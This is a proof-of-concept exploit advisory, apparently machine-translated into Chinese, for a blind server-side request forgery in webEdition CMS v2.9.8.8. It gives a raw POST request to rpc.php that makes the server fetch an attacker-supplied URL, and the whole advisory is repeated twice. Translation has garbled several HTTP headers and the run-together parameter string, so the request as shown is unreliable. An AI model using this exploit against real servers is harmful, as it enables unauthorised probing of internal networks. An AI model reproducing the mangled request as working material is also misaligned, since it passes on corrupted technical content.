利用标题:网络CMS v2.9.8.8-盲人SSRF
Application:网络介绍CMS
版本: v2.9.8.8
Bugs:盲ssrf
Technology: php
供应商url: https://www.webedition.org/
软件link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
发现日期: 07.09.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
写https://youserver/test.xml至we_cmd [0]参数
POC请求
post/webedition/rpc.php?cmd=widgetGetrssmod=rss http/1.1
HOST: LOCALHOST
内容长度: 141
SEC-CH-UA:
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/webedition/index.php?we_cmd [0]=startwe
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: treewidth_main=300; Wesession=41A9164E606666254199B3EA1CD3D2E0AD969C379; cookie=yep; treewidth_main=300
连接:关闭
WE_CMD [0]=https://you-server/test.xmlwe_cmd [1]=111000we_cmd [2]=0we_cmd [3]=11000000we_cmd [4]=WE_CMD [WE_CMD [5]=M_3
Application:网络介绍CMS
版本: v2.9.8.8
Bugs:盲ssrf
Technology: php
供应商url: https://www.webedition.org/
软件link: https://download.webedition.org/releases/onlinestaller.tgz?p=1
发现日期: 07.09.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
写https://youserver/test.xml至we_cmd [0]参数
POC请求
post/webedition/rpc.php?cmd=widgetGetrssmod=rss http/1.1
HOST: LOCALHOST
内容长度: 141
SEC-CH-UA:
ACCEPT:应用程序/JSON,text/javaScript, /; Q=0.01
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
sec-ch-ua-mobile:0
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform:''
Origin: http://localhost
sec-fetch-site:相同原产
sec-fetch mode: cors
sec-fetch-Dest:空
Referer: http://localhost/webedition/index.php?we_cmd [0]=startwe
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: treewidth_main=300; Wesession=41A9164E606666254199B3EA1CD3D2E0AD969C379; cookie=yep; treewidth_main=300
连接:关闭
WE_CMD [0]=https://you-server/test.xmlwe_cmd [1]=111000we_cmd [2]=0we_cmd [3]=11000000we_cmd [4]=WE_CMD [WE_CMD [5]=M_3